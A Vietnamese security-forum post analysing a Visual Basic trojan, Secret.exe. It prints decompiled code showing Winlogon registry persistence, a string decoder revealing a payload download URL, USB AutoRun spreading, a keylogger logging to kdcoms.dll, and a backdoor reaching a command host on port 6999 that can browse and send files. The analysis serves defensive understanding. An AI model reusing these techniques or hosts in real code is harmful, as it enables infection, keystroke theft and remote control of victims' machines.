Admin Administrotor
Tổng số bài gửi : 877 Join date : 24/07/2010
| Tiêu đề: [Phân tích] Virus Secret.exe (PhimNguoiLon) Sun Mar 06, 2011 10:58 pm | |
| Thật đáng thật vọng, DungCoi tiếp xúc với ít nhất 4 biến thể virus này, mà cũng chẳng thay đổi bao nhiêu. Tác giả nó chỉ ăn lui ăn lại một thứ mà ko chán nhỉ ? - Dùng VB Decompiler thi nhận ra một số đoạn đáng chú ý sau :
Project gồm 2 form : Form1 và Form2
Form 1 gồm : Các thao tác hoạt động cơ bản của virus
loc_412533: If CBool((Me.global_88 = "Saturday") Or (Me.global_88 = "Tuesday")) Then '412595 loc_412544: var_AC = CVar(Unknown_40F54C(Me.global_88, CLng(Me.global_72), &H0, &H0, Me.global_72, "", "", "", "") & "\kdcoms32.dll") 'String loc_412553: If Not (Unknown_40F1FC(var_AC)) Then '41256C loc_412564: Timer4.Enabled = &HFF loc_41256C: End If Thứ 7 hoặc thứ 3 sẽ tiến hành cho Timer4 làm việc (Update virus)
loc_40F2B1: LitStr "\userinit.exe" .... loc_40F2C2: LitStr "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" loc_410A66: LitStr "\system32\system.exe" loc_41207D: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "Explorer.exe", &H0) loc_4120B7: &H80000002 = Unknown_40F620("SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", Unknown_40F54C() & "\system32\userinit.exe,")
loc_4121A3: var_AC = CVar(Unknown_40F54C("") & "\kdcoms.dll") 'String loc_4121B1: If Unknown_40F1FC(var_AC) Then '4121FA loc_4121CD: var_C8 = Unknown_40F54C() & "\kdcoms.dll" loc_4121D0: ext_401090 loc_4121EC: var_AC = CVar(Unknown_40F54C("", &H0) & "\kdcoms.dll") 'String loc_4121EF: ext_401030 loc_4121FA: End If
Private Sub Timer4_Timer() '4101D0 'Data Table: 40BD20 loc_4100D4: On Error GoTo 0 loc_4100E5: Timer4.Enabled = &H0 loc_4100FB: var_9C = CVar(Unknown_40F54C() & "\kdcoms32.dll") 'String loc_410109: If Unknown_40F1FC(var_9C) Then '4101CA loc_41011C: If (Me.global_88 = "Tuesday") Then '410174 loc_41014A: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8qjhxwurwn8orun|8}j|t7{j{", &H9))) & "\system32\task.exe") 'String loc_410158: Call var_88.DL1.Address_4165C0 loc_410171: GoTo loc_4101C8 loc_410174: End If loc_4101A1: var_C8 = CVar(Unknown_40F54C(CVar(Decode("q}}yC88orun|7v‚xy n{j7lxv8yq~xwp6qxwp8orun|8}j|t7{j{", &H9)), var_C8) & "\system32\task.exe") 'String loc_4101AF: Call var_88.DL1.Address_4165C0 loc_4101C8: ' Referenced from: 410171 loc_4101CA: End If loc_4101CE: Exit Sub End Sub
Function Decode : Public Function Decode(Data, Depth) '40FD1C 'Data Table: 40BD20 loc_40FC5A: On Error GoTo 0 loc_40FC69: For var_9A = &H1 To CInt(Len(Data)): var_96 = var_9A 'Integer loc_40FC71: var_BC = 1 loc_40FC82: var_8C = ext_401018 loc_40FC92: var_8E = ext_401004 loc_40FC9D: If (Depth = &H0) Then '40FCA7 loc_40FCA4: Depth = &H28 loc_40FCA7: End If loc_40FCB0: If (Depth > 254) Then '40FCBB loc_40FCB8: Depth = 254 loc_40FCBB: End If loc_40FCCF: If ((var_8E - Depth) < &H0) Then '40FCDE loc_40FCDB: var_8E = (var_8E + 255) loc_40FCDE: End If loc_40FCE7: ext_401054 loc_40FCFF: var_94 = var_94 & CStr("") loc_40FD07: Next var_9A 'Integer loc_40FD11: var_88 = var_94 loc_40FD16: Result = arg_14: Exit Sub End Function
Nếu bạn đã từng đọc qua Function này ở Source nào đó thì bạn sẽ nhận ra ngày, đoạn code gốc :
Public Function Decode(Data As String, Optional Depth As Integer) As String Dim TempChar As String Dim TempAsc As Integer Dim NewData As String Dim vChar As Integer
For vChar = 1 To Len(Data) TempChar = Mid$(Data, vChar, 1) TempAsc = Asc(TempChar) If Depth = 0 Then Depth = 40 If Depth > 254 Then Depth = 254 TempAsc = TempAsc - Depth If TempAsc < 0 Then TempAsc = TempAsc + 255 TempChar = Chr(TempAsc) NewData = NewData & TempChar Next vChar Decode = NewData
End Function
Kết quả giải mã String : q}}yC88orun|7v‚xyn{j7lxv8qjhxwurwn8orun|8}j|t7{j{ " là http://files.myopera.com/hav_online/files/task.rar
loc_41141B: var_1AC = var_17C And (var_17C <> "A") loc_41142A: ext_401088 loc_411435: ext_40102C loc_41145A: If CBool(var_1CC And (var_1CC <> "B")) Then '411B9C loc_411461: var_86 = &HFF loc_411477: var_15C = var_DC & "\" & "Secret.exe" loc_41147F: VarLateMemCallLdVar loc_411496: If CBool(Not var_9C) Then '41154F loc_4114E2: var_21C = CStr(var_DC & "\" & "Secret.exe") loc_4114FB: var_218 = App.Path & "\" & App.EXEName & ".exe" loc_4114FE: ext_401070 loc_41153C: var_204 = CStr(var_DC & "\" & "Secret.exe") loc_411540: ext_401090 loc_41154F: End If loc_41155B: var_12C = var_DC & "\AutoRun.inf" loc_411563: VarLateMemCallLdVar loc_411574: If CBool(var_9C) Then '4115AF loc_41158A: var_204 = CStr(var_DC & "\AutoRun.inf") loc_41158E: ext_401090 loc_4115A3: var_12C = var_DC & "\AutoRun.inf" loc_4115A7: ext_401030 loc_4115AF: End If loc_4115C7: Open CStr(var_DC & "\AutoRun.inf") For Output As &H1 Len = &HFF loc_4115D8: Print &H1, "[AutoRun]" loc_4115E5: Print &H1, "open=Secret.exe" loc_4115F2: Print &H1, ";shell\open=Open(&O)" loc_4115FF: Print &H1, "shell\open\Command=Secret.exe" loc_41160C: Print &H1, "shell\open\Default=1" loc_411619: Print &H1, ";shell\explore=Manager(&X)" loc_411626: Print &H1, "shell\explore\Command=Secret.exe" loc_411630: Close &H1 loc_411645: var_204 = CStr(var_DC & "\AutoRun.inf")
Ghi file Autoruns.inf và Secret.exe vào đĩa USB.
Module1 : Cho thấy các thao tác KeyLog.
Public Sub init() '410078 'Data Table: 40BD20 loc_40FFA0: On Error GoTo 0 loc_40FFB1: var_98 = CVar(Unknown_40F54C() & "\system32\MSWINSCK.OCX") 'String loc_40FFC0: If Not (Unknown_40F1FC(var_98)) Then '410056 loc_410006: Open Unknown_40F54C() & "\system32\MSWINSCK.OCX" For Binary As &H1 Len = &HFF loc_41001D: Put &H1, &H1, LoadResData(101, "CUSTOM") loc_410025: Close &H1 loc_410044: ext_40103C loc_410049: var_CC = CVar(%x2 & Unknown_40F54C("Regsvr32", &H2) & "\system32\MSWINSCK.OCX /s") loc_410056: End If loc_41006A: Load MemVar_416064 loc_410074: Exit Sub End Sub
Ghi đè MSWINSCK.OCX bằng Data trong Resource
Form2 gồm : Các lệnh điều khiển Trojan Private Sub Timer1_Timer() '40F884 'Data Table: 40B764 loc_40F7F4: On Error GoTo 0 loc_40F805: Timer1.Enabled = &H0 loc_40F819: var_98 = var_88.@filesize@ loc_40F82A: If (CInt(var_98) <> &H7) Then '40F867 loc_40F839: call var_88..Address_40D1F0 loc_40F846: var_A8 = "scsd.ath.cx" loc_40F84C: var_C8 = 6999 loc_40F85C: call var_88..Address_40D1E0 loc_40F867: End If loc_40F877: var_88.Timer.Enabled = &HFF loc_40F881: Exit Sub End Sub
Kết nối với Server qua máy chủ và cổng ở trên.
Private Sub ws_() '410D48 'Data Table: 40B764 loc_410B14: On Error GoTo 0 loc_410B32: Call var_9C.ws.Address_40BA0C loc_410B57: If (InStr(&H1, "", "@chdirec@", &H0) <> &H0) Then '410BED loc_410B79: var_88 = ext_401048 loc_410B81: ext_401050 loc_410B8E: ext_401068 loc_410BA4: Dir1.Path = CStr(var_BC) loc_410BBE: ext_401068 loc_410BD4: File1.Path = CStr(var_BC) loc_410BE8: Call sendinfo loc_410BED: End If loc_410C09: If (InStr(&H1, var_88, "@chdrv@", &H0) <> &H0) Then '410C9F loc_410C2B: var_88 = ext_401048 loc_410C33: ext_40105C loc_410C40: ext_401068 loc_410C56: Dir1.Path = CStr(var_BC) loc_410C70: ext_401068 loc_410C86: File1.Path = CStr(var_BC) loc_410C9A: Call sendinfo loc_410C9F: End If loc_410CBB: If (InStr(&H1, var_88, "@sendfile@", &H0) <> &H0) Then '410D1B loc_410CC6: Me.global_72 = True loc_410CEF: Me.global_52 = CVar(ext_401048) loc_410CFA: Close &H1 loc_410D0D: Open CStr(Me.global_52) For Binary As &H1 Len = &HFF loc_410D16: Call SendFile loc_410D1B: End If loc_410D37: If (InStr(&H1, var_88, "@cancel@", &H0) <> &H0) Then '410D44 loc_410D41: Me.global_104 = &HFF loc_410D44: End If loc_410D46: Exit Sub End Sub
Virus sử dụng Control là MSWINSCK.OCX đã trích xuất làm để tiến hành chờ các gói tin và trả lời các gói tin đó.
Private Sub Timer2_Timer() '411044 'Data Table: 40B764 loc_410D90: On Error GoTo 0 loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68) loc_410DCA: If ((MemVar_416040 <> "") And (Len(MemVar_416040) > &H2)) Then '410E70 loc_410E07: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410E2F loc_410E13: var_A0 = CVar("@yahoo@" & MemVar_416040) 'String loc_410E21: call var_90..Address_0 loc_410E2F: End If loc_410E46: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF loc_410E58: Print &H2, MemVar_416040 loc_410E62: Close &H2 loc_410E6F: Exit Sub loc_410E70: End If loc_410E8F: If (InStr(&H1, Me.global_68, "@enter@", &H0) <> &H0) Then '410F7F loc_410EBA: Me.global_68 = ext_401048 loc_410ECE: If (Me.global_68 <> "") Then '410F7A loc_410F0B: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410F36 loc_410F1A: var_A0 = CVar("@yahoo@" & Me.global_68) 'String loc_410F28: call var_90..Address_0 loc_410F36: End If loc_410F4D: Open Unknown_40F54C("", Me.global_68, "@enter@", "", &H1, &HFFFFFFFF, &H1) & "\kdcoms.dll" For Append As &H2 Len = &HFF loc_410F62: Print &H2, Me.global_68 loc_410F6C: Close &H2 loc_410F7A: End If loc_410F7E: Exit Sub loc_410F7F: End If loc_410F90: If (Len(Me.global_68) > &H37) Then '41103C loc_410FCD: If CBool((CInt(var_90.@filesize@) = &H7) And (Me.global_72 = False)) Then '410FF8 loc_410FDC: var_A0 = CVar("@yahoo@" & Me.global_68) 'String loc_410FEA: call var_90..Address_0 loc_410FF8: End If loc_41100F: Open Unknown_40F54C("") & "\kdcoms.dll" For Append As &H2 Len = &HFF loc_411024: Print &H2, Me.global_68 loc_41102E: Close &H2 loc_41103C: End If loc_411040: Exit Sub End Sub
Sau mỗi thao tác Enter sẽ ghi thêm thông tin nhập trước đó vào file kdcoms.dll
Module1 : Hàm đặt KeyLog (Được gọi ở Form2) qua lênh sau ở Form2 : loc_410DAA: Me.global_68 = %x2 & Unknown_414E84(Me.global_68)
Mẫu virus ko đặt pass, ai cài AV ráng chịu
Nguồn:vrvn | |
|